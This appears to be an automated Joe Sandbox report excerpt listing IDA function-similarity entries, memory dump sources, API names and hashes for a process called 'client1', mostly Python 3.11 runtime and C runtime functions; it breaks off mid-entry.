                                                    • Source File: 00000002.00000002.2693290777.00007FFBAA731000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFBAA730000, based on PE: true
                                                    • Associated: 00000002.00000002.2693275344.00007FFBAA730000.00000002.00000001.01000000.00000015.sdmp
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA735000.00000002.00000001.01000000.00000015.sdmp
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA792000.00000002.00000001.01000000.00000015.sdmp
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA7DE000.00000002.00000001.01000000.00000015.sdmp
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA7E1000.00000002.00000001.01000000.00000015.sdmp
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA7E6000.00000002.00000001.01000000.00000015.sdmp
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA840000.00000002.00000001.01000000.00000015.sdmp
                                                    • Associated: 00000002.00000002.2693474597.00007FFBAA843000.00000004.00000001.01000000.00000015.sdmp
                                                    • Associated: 00000002.00000002.2693491810.00007FFBAA845000.00000002.00000001.01000000.00000015.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa730000_client1.jbxd
                                                    Similarity
                                                    • API ID: Arg_ArgumentReadyUnicode_
                                                    • String ID: a unicode character$argument$decomposition
                                                    • API String ID: 1875788646-2471543666
                                                    • Opcode ID: 8e092fff27016ad70a75c21de804b5fd7f142a4693611c384d04bc395b3b3e7a
                                                    • Instruction ID: bf31567467bcae324406533f39f3e49a4e93194b3ea7251f7f5afbb862f39c69
                                                    • Opcode Fuzzy Hash: 8e092fff27016ad70a75c21de804b5fd7f142a4693611c384d04bc395b3b3e7a
                                                    • Instruction Fuzzy Hash: 0F01A2E0B0A697E5EA5AEF35E44017A2368AF05B94F4511B1DE6E46290DF3CD4978330
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693290777.00007FFBAA731000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFBAA730000, based on PE: true
                                                    • Associated: 00000002.00000002.2693275344.00007FFBAA730000.00000002.00000001.01000000.00000015.sdmp
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA735000.00000002.00000001.01000000.00000015.sdmp
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA792000.00000002.00000001.01000000.00000015.sdmp
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA7DE000.00000002.00000001.01000000.00000015.sdmp
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA7E1000.00000002.00000001.01000000.00000015.sdmp
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA7E6000.00000002.00000001.01000000.00000015.sdmp
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA840000.00000002.00000001.01000000.00000015.sdmp
                                                    • Associated: 00000002.00000002.2693474597.00007FFBAA843000.00000004.00000001.01000000.00000015.sdmp
                                                    • Associated: 00000002.00000002.2693491810.00007FFBAA845000.00000002.00000001.01000000.00000015.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa730000_client1.jbxd
                                                    Similarity
                                                    • API ID: Arg_ArgumentReadyUnicode_
                                                    • String ID: a unicode character$argument$east_asian_width
                                                    • API String ID: 1875788646-3913127203
                                                    • Opcode ID: 1cd4da9dc117a34be79d860a1371cb1431d82210e1bfc1e6159635a71f123b29
                                                    • Instruction ID: 506d62107cdebae755435694e744b0efe80b8467a06391ee3fe934af6f5ca7e8
                                                    • Opcode Fuzzy Hash: 1cd4da9dc117a34be79d860a1371cb1431d82210e1bfc1e6159635a71f123b29
                                                    • Instruction Fuzzy Hash: 4D0126E0B0AA47C5EA5AEF31E8441B72368EF06B84F4510B1CE0E06280DF3CE0878330
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693290777.00007FFBAA731000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFBAA730000, based on PE: true
                                                    • Associated: 00000002.00000002.2693275344.00007FFBAA730000.00000002.00000001.01000000.00000015.sdmp
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA735000.00000002.00000001.01000000.00000015.sdmp
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA792000.00000002.00000001.01000000.00000015.sdmp
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA7DE000.00000002.00000001.01000000.00000015.sdmp
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA7E1000.00000002.00000001.01000000.00000015.sdmp
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA7E6000.00000002.00000001.01000000.00000015.sdmp
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA840000.00000002.00000001.01000000.00000015.sdmp
                                                    • Associated: 00000002.00000002.2693474597.00007FFBAA843000.00000004.00000001.01000000.00000015.sdmp
                                                    • Associated: 00000002.00000002.2693491810.00007FFBAA845000.00000002.00000001.01000000.00000015.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa730000_client1.jbxd
                                                    Similarity
                                                    • API ID: Mem_$Capsule_Err_FreeMallocMemory
                                                    • String ID: unicodedata._ucnhash_CAPI
                                                    • API String ID: 3673501854-3989975041
                                                    • Opcode ID: 9c8937bca7593cf83dc6e6686b6a5b89807f230b44c95862bfa962c91a770e15
                                                    • Instruction ID: 7b828c5245223a57c2c0424083bb7dcff172cb00f5949faab49e71464004ea4b
                                                    • Opcode Fuzzy Hash: 9c8937bca7593cf83dc6e6686b6a5b89807f230b44c95862bfa962c91a770e15
                                                    • Instruction Fuzzy Hash: 01F0F6A0B0BB43D6EA12AF25E81417A63ACBF18B84B4610B5CD4E06754EF2CE4468370
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2695432092.00007FFBAB491000.00000020.00000001.01000000.00000014.sdmp, Offset: 00007FFBAB490000, based on PE: true
                                                    • Associated: 00000002.00000002.2695413787.00007FFBAB490000.00000002.00000001.01000000.00000014.sdmp
                                                    • Associated: 00000002.00000002.2695456347.00007FFBAB4A4000.00000002.00000001.01000000.00000014.sdmp
                                                    • Associated: 00000002.00000002.2695478650.00007FFBAB4AA000.00000004.00000001.01000000.00000014.sdmp
                                                    • Associated: 00000002.00000002.2695501720.00007FFBAB4AE000.00000002.00000001.01000000.00000014.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbab490000_client1.jbxd
                                                    Similarity
                                                    • API ID: DeallocDict_ItemPackTuple_
                                                    • String ID: <module>$x
                                                    • API String ID: 4228545439-1318447075
                                                    Similarity
                                                    • API ID: DeallocDict_ItemPackTuple_
                                                    • String ID: <module>$t
                                                    • API String ID: 4228545439-2084846924
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693036603.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000002.00000002.2693018203.00007FF79F620000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693061814.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F660000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693132419.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                    • String ID: CorExitProcess$mscoree.dll
                                                    • API String ID: 4061214504-1276376045
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693167366.00007FFBAA6F1000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA6F0000, based on PE: true
                                                    • Associated: 00000002.00000002.2693151925.00007FFBAA6F0000.00000002.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693193696.00007FFBAA719000.00000002.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693211520.00007FFBAA727000.00000004.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693226656.00007FFBAA728000.00000008.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693243662.00007FFBAA729000.00000004.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693259098.00007FFBAA72A000.00000002.00000001.01000000.00000016.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa6f0000_client1.jbxd
                                                    Similarity
                                                    • API ID: Bool_ContextDeallocFromLongVar_
                                                    • String ID:
                                                    • API String ID: 2775757836-0
                                                    APIs
                                                    • PyMem_Malloc.PYTHON311(?,?,?,00007FFBAA706856,?,?,?,00007FFBAA706720), ref: 00007FFBAA706966
                                                    • _PyUnicode_Ready.PYTHON311(?,?,?,00007FFBAA706856,?,?,?,00007FFBAA706720), ref: 00007FFBAA715408
                                                    Similarity
                                                    • API ID: MallocMem_ReadyUnicode_
                                                    • String ID:
                                                    • API String ID: 3281404053-0
                                                    Similarity
                                                    • API ID: Dealloc$Arg_Err_FormatObject_ParseSubtypeTupleType_
                                                    • String ID:
                                                    • API String ID: 1313511727-0
                                                    Similarity
                                                    • API ID: Dealloc$Arg_Err_FormatFreeMem_Object_ParseSubtypeTupleType_
                                                    • String ID:
                                                    • API String ID: 2710705848-0
                                                    Similarity
                                                    • API ID: Dealloc$Arg_Err_FormatObject_ParseSubtypeTupleType_
                                                    • String ID:
                                                    • API String ID: 1313511727-0
                                                    Similarity
                                                    • API ID: DeallocFreeMem_$Arg_Err_FormatObject_ParseSubtypeTupleType_
                                                    • String ID:
                                                    • API String ID: 1618042208-0
                                                    Similarity
                                                    • API ID: Dealloc$Arg_Err_FormatObject_ParseSubtypeTupleType_
                                                    • String ID:
                                                    • API String ID: 1313511727-0
                                                    Similarity
                                                    • API ID: Dealloc$Arg_Err_FormatObject_ParseSubtypeTupleType_
                                                    • String ID:
                                                    • API String ID: 1313511727-0
                                                    Similarity
                                                    • API ID: Dealloc$Arg_Err_FormatObject_ParseSubtypeTupleType_
                                                    • String ID:
                                                    • API String ID: 1313511727-0
                                                    Similarity
                                                    • API ID: Dealloc$Arg_Err_FormatObject_ParseSubtypeTupleType_
                                                    • String ID:
                                                    • API String ID: 1313511727-0
                                                    Similarity
                                                    • API ID: Dealloc$Arg_Err_FormatObject_ParseSubtypeTupleType_
                                                    • String ID:
                                                    • API String ID: 1313511727-0
                                                    Similarity
                                                    • API ID: Dealloc$Arg_Err_FormatObject_ParseSubtypeTupleType_
                                                    • String ID:
                                                    • API String ID: 1313511727-0
                                                    • Opcode ID: 598ef48ed3feb993cd3434401894e552203ae3f77933b81a56c8fa31284e1aef
                                                    • Instruction ID: 37c76b311fd816f4d46da8be9be39798d0c86bbbe98ed871d229e8046328b779
                                                    • Opcode Fuzzy Hash: 598ef48ed3feb993cd3434401894e552203ae3f77933b81a56c8fa31284e1aef
                                                    • Instruction Fuzzy Hash: 373130B2A0AA22D5EB129F75D8140BE27A8BB44B94F445072EF0D27794EF3CE547C360
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693167366.00007FFBAA6F1000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA6F0000, based on PE: true
                                                    • Associated: 00000002.00000002.2693151925.00007FFBAA6F0000.00000002.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693193696.00007FFBAA719000.00000002.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693211520.00007FFBAA727000.00000004.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693226656.00007FFBAA728000.00000008.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693243662.00007FFBAA729000.00000004.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693259098.00007FFBAA72A000.00000002.00000001.01000000.00000016.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa6f0000_client1.jbxd
                                                    Similarity
                                                    • API ID: Dealloc$Arg_Err_FormatFreeMem_Object_ParseSubtypeTupleType_
                                                    • String ID:
                                                    • API String ID: 2710705848-0
                                                    • Opcode ID: 9bf83651b9248913a87182242b3306fade458d8e5a4bdc2252f3f6c05ce57619
                                                    • Instruction ID: 2086f882e8e912dde4b4efe1fba88a1c93d6b547ebab494b4c4a874429fc88eb
                                                    • Opcode Fuzzy Hash: 9bf83651b9248913a87182242b3306fade458d8e5a4bdc2252f3f6c05ce57619
                                                    • Instruction Fuzzy Hash: C2316CB2A0AA12D5EB02CF75CD001BD27A8AB44F98B441076EE0E16A94DE3CE54BC760
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693167366.00007FFBAA6F1000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA6F0000, based on PE: true
                                                    • Associated: 00000002.00000002.2693151925.00007FFBAA6F0000.00000002.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693193696.00007FFBAA719000.00000002.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693211520.00007FFBAA727000.00000004.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693226656.00007FFBAA728000.00000008.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693243662.00007FFBAA729000.00000004.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693259098.00007FFBAA72A000.00000002.00000001.01000000.00000016.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa6f0000_client1.jbxd
                                                    Similarity
                                                    • API ID: Dealloc$Arg_Err_FormatObject_ParseSubtypeTupleType_
                                                    • String ID:
                                                    • API String ID: 1313511727-0
                                                    • Opcode ID: 4b922b14ed2df5f95d6a3c8600b3e69bdbc7d02d17ce986268312cc727099299
                                                    • Instruction ID: a32a76992620bcce32b9da415b8c437fca4d69093295800ec8688661a9237d56
                                                    • Opcode Fuzzy Hash: 4b922b14ed2df5f95d6a3c8600b3e69bdbc7d02d17ce986268312cc727099299
                                                    • Instruction Fuzzy Hash: 92314FB2A1AA52E5FB068F75D8500BE27A8BB54B94F540472DF0E23694DE3CE547C3A0
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693167366.00007FFBAA6F1000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA6F0000, based on PE: true
                                                    • Associated: 00000002.00000002.2693151925.00007FFBAA6F0000.00000002.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693193696.00007FFBAA719000.00000002.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693211520.00007FFBAA727000.00000004.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693226656.00007FFBAA728000.00000008.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693243662.00007FFBAA729000.00000004.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693259098.00007FFBAA72A000.00000002.00000001.01000000.00000016.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa6f0000_client1.jbxd
                                                    Similarity
                                                    • API ID: Dealloc$Arg_Err_FormatObject_ParseSubtypeTupleType_
                                                    • String ID:
                                                    • API String ID: 1313511727-0
                                                    • Opcode ID: 844bbb5691821b1cc13d245fc9a8206d144c37ccdb7aeed84f449f5af1792079
                                                    • Instruction ID: 303c55c76d5e2f6a62b87c805f38c26fdbbb76fa3d4b75715f08734d482a6e54
                                                    • Opcode Fuzzy Hash: 844bbb5691821b1cc13d245fc9a8206d144c37ccdb7aeed84f449f5af1792079
                                                    • Instruction Fuzzy Hash: CE3153B2A0AA12D5EB128F75D8540BE27A8FB44B94F444472DE0E637A4DF3CE647C360
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693167366.00007FFBAA6F1000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA6F0000, based on PE: true
                                                    • Associated: 00000002.00000002.2693151925.00007FFBAA6F0000.00000002.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693193696.00007FFBAA719000.00000002.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693211520.00007FFBAA727000.00000004.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693226656.00007FFBAA728000.00000008.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693243662.00007FFBAA729000.00000004.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693259098.00007FFBAA72A000.00000002.00000001.01000000.00000016.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa6f0000_client1.jbxd
                                                    Similarity
                                                    • API ID: Dealloc$Arg_Err_FormatObject_ParseSubtypeTupleType_
                                                    • String ID:
                                                    • API String ID: 1313511727-0
                                                    • Opcode ID: c56d67d7fb87bf70e876d31f1775e73e7f2e2e4ce7a9f9d722aab63a9b3f74bb
                                                    • Instruction ID: 4fde4ae1f4f982bfffcf68f8fc045e94b23903c4be9a2ad1a760f93ce389e416
                                                    • Opcode Fuzzy Hash: c56d67d7fb87bf70e876d31f1775e73e7f2e2e4ce7a9f9d722aab63a9b3f74bb
                                                    • Instruction Fuzzy Hash: 0B3184B2A1AA42D0EA168F75D4100BE67A8FB44B94F480072DE4D237A4DE6DE947C360
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2695432092.00007FFBAB491000.00000020.00000001.01000000.00000014.sdmp, Offset: 00007FFBAB490000, based on PE: true
                                                    • Associated: 00000002.00000002.2695413787.00007FFBAB490000.00000002.00000001.01000000.00000014.sdmp
                                                    • Associated: 00000002.00000002.2695456347.00007FFBAB4A4000.00000002.00000001.01000000.00000014.sdmp
                                                    • Associated: 00000002.00000002.2695478650.00007FFBAB4AA000.00000004.00000001.01000000.00000014.sdmp
                                                    • Associated: 00000002.00000002.2695501720.00007FFBAB4AE000.00000002.00000001.01000000.00000014.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbab490000_client1.jbxd
                                                    Similarity
                                                    • API ID: DeallocFromLong_Ssize_t$BoolCompareObject_Rich
                                                    • String ID:
                                                    • API String ID: 4107546884-0
                                                    • Opcode ID: 4821959062ce02670e9ec4436a29c581b01c2ae1a39208a79a00cf5ea6450531
                                                    • Instruction ID: 9efed3fef6a6518a374f061584967590a76e6cc8bb3306dbf38b0f3ea5870812
                                                    • Opcode Fuzzy Hash: 4821959062ce02670e9ec4436a29c581b01c2ae1a39208a79a00cf5ea6450531
                                                    • Instruction Fuzzy Hash: 9D119172A0AA4352EE564B3AE9E427D5291AF55BF0F089334CE7E067F4DF2CE8418340
                                                    APIs
                                                      • Part of subcall function 00007FFBAA6FE780: PyContextVar_Get.PYTHON311(?,?,?,?,00007FFBAA6F1345), ref: 00007FFBAA6FE792
                                                    • PyUnicode_New.PYTHON311(?,?,?,00007FFBAA6F3A6E), ref: 00007FFBAA6F3BD6
                                                    • memmove.VCRUNTIME140(?,?,?,00007FFBAA6F3A6E), ref: 00007FFBAA6F3C0B
                                                    • PyMem_Free.PYTHON311(?,?,?,00007FFBAA6F3A6E), ref: 00007FFBAA6F3C13
                                                    • _Py_Dealloc.PYTHON311(?,?,?,00007FFBAA6F3A6E,?,?,?,00007FFBAA6F2508), ref: 00007FFBAA711725
                                                    • PyErr_NoMemory.PYTHON311(?,?,?,00007FFBAA6F3A6E), ref: 00007FFBAA711731
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693167366.00007FFBAA6F1000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA6F0000, based on PE: true
                                                    • Associated: 00000002.00000002.2693151925.00007FFBAA6F0000.00000002.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693193696.00007FFBAA719000.00000002.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693211520.00007FFBAA727000.00000004.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693226656.00007FFBAA728000.00000008.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693243662.00007FFBAA729000.00000004.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693259098.00007FFBAA72A000.00000002.00000001.01000000.00000016.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa6f0000_client1.jbxd
                                                    Similarity
                                                    • API ID: ContextDeallocErr_FreeMem_MemoryUnicode_Var_memmove
                                                    • String ID:
                                                    • API String ID: 3813649885-0
                                                    • Opcode ID: fde4ab65b1b8772268641664e38ce450bc40635912e65faa1664aebf4ab429c6
                                                    • Instruction ID: c13021ff3fe92464d1e325dcddc327913575fa20a815e0e9ac0be1dc165bc178
                                                    • Opcode Fuzzy Hash: fde4ab65b1b8772268641664e38ce450bc40635912e65faa1664aebf4ab429c6
                                                    • Instruction Fuzzy Hash: E02180A1B1A642C2EA169F35D81427E6798EF84FC0F042075DE0E07795DF2CE84ADB60
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693036603.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000002.00000002.2693018203.00007FF79F620000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693061814.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F660000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693132419.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: _set_statfp
                                                    • String ID:
                                                    • API String ID: 1156100317-0
                                                    • Opcode ID: 69d38c35bd33e64192705e47d806ebaffe6519085bb8d16871af39b095092657
                                                    • Instruction ID: 994d73378fc6788d0adf3b655954d8948b8ff5b4b35ccd91aa673180338e089c
                                                    • Opcode Fuzzy Hash: 69d38c35bd33e64192705e47d806ebaffe6519085bb8d16871af39b095092657
                                                    • Instruction Fuzzy Hash: 3811CE32E58B8705F6B43138E4523F9944B6F593F4F880230EA7E06AE6DF2CAC614275
                                                    APIs
                                                    • FlsGetValue.KERNEL32(?,?,?,00007FF79F639A73,?,?,00000000,00007FF79F639D0E,?,?,?,?,?,00007FF79F6321EC), ref: 00007FF79F63A87F
                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF79F639A73,?,?,00000000,00007FF79F639D0E,?,?,?,?,?,00007FF79F6321EC), ref: 00007FF79F63A89E
                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF79F639A73,?,?,00000000,00007FF79F639D0E,?,?,?,?,?,00007FF79F6321EC), ref: 00007FF79F63A8C6
                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF79F639A73,?,?,00000000,00007FF79F639D0E,?,?,?,?,?,00007FF79F6321EC), ref: 00007FF79F63A8D7
                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF79F639A73,?,?,00000000,00007FF79F639D0E,?,?,?,?,?,00007FF79F6321EC), ref: 00007FF79F63A8E8
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693036603.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000002.00000002.2693018203.00007FF79F620000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693061814.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F660000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693132419.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: Value
                                                    • String ID:
                                                    • API String ID: 3702945584-0
                                                    • Opcode ID: daef540501b22c12116ffc374b0892d30f9c5b790841e2ef32b7e795c096c5e6
                                                    • Instruction ID: 87755686d646a12ca7cb0f6417ada6b8332a2dd90d1f76302ff083e3e3c9446f
                                                    • Opcode Fuzzy Hash: daef540501b22c12116ffc374b0892d30f9c5b790841e2ef32b7e795c096c5e6
                                                    • Instruction Fuzzy Hash: 27114C24E1C3C241FA78B335AA411FAE24B5F557B0F844334E87E566D6DEADB4429630
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2695432092.00007FFBAB491000.00000020.00000001.01000000.00000014.sdmp, Offset: 00007FFBAB490000, based on PE: true
                                                    • Associated: 00000002.00000002.2695413787.00007FFBAB490000.00000002.00000001.01000000.00000014.sdmp
                                                    • Associated: 00000002.00000002.2695456347.00007FFBAB4A4000.00000002.00000001.01000000.00000014.sdmp
                                                    • Associated: 00000002.00000002.2695478650.00007FFBAB4AA000.00000004.00000001.01000000.00000014.sdmp
                                                    • Associated: 00000002.00000002.2695501720.00007FFBAB4AE000.00000002.00000001.01000000.00000014.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbab490000_client1.jbxd
                                                    Similarity
                                                    • API ID: Dealloc
                                                    • String ID:
                                                    • API String ID: 3617616757-0
                                                    • Opcode ID: 59fd99aa59ad4cd2daa3baf9135be3f54364d6e67369a80bc17930a723797b6e
                                                    • Instruction ID: b1ca36f50039b0cb1884bfb0a20700c646cc0552d7abf2c0bebc63ee07f500e3
                                                    • Opcode Fuzzy Hash: 59fd99aa59ad4cd2daa3baf9135be3f54364d6e67369a80bc17930a723797b6e
                                                    • Instruction Fuzzy Hash: 5321EDB295660181EB5A8F79D8D837C32A4EF55B38F199334CE79011F2CF7E99858340
                                                    APIs
                                                    • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,00007FF79F642433,?,?,?,00007FF79F63CB8C,?,?,00000000,00007FF79F633A5F), ref: 00007FF79F63A705
                                                    • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00007FF79F642433,?,?,?,00007FF79F63CB8C,?,?,00000000,00007FF79F633A5F), ref: 00007FF79F63A724
                                                    • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00007FF79F642433,?,?,?,00007FF79F63CB8C,?,?,00000000,00007FF79F633A5F), ref: 00007FF79F63A74C
                                                    • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00007FF79F642433,?,?,?,00007FF79F63CB8C,?,?,00000000,00007FF79F633A5F), ref: 00007FF79F63A75D
                                                    • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00007FF79F642433,?,?,?,00007FF79F63CB8C,?,?,00000000,00007FF79F633A5F), ref: 00007FF79F63A76E
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693036603.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000002.00000002.2693018203.00007FF79F620000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693061814.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F660000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693132419.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: Value
                                                    • String ID:
                                                    • API String ID: 3702945584-0
                                                    • Opcode ID: 73fca214f1e943932ff67b95d9a940e5d6c6a0bd2e4835b222ff28ae142fb13c
                                                    • Instruction ID: 9076ae7c84df3867ed5b9104e1184d68ed80a24e79805a6537f48b8d8785659b
                                                    • Opcode Fuzzy Hash: 73fca214f1e943932ff67b95d9a940e5d6c6a0bd2e4835b222ff28ae142fb13c
                                                    • Instruction Fuzzy Hash: 51112A28E0C38301F978BB7148921FA92AB4F56770F840734D83E4A6D2DDADB441A631
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693167366.00007FFBAA6F1000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA6F0000, based on PE: true
                                                    • Associated: 00000002.00000002.2693151925.00007FFBAA6F0000.00000002.00000001.01000000.00000016.sdmp
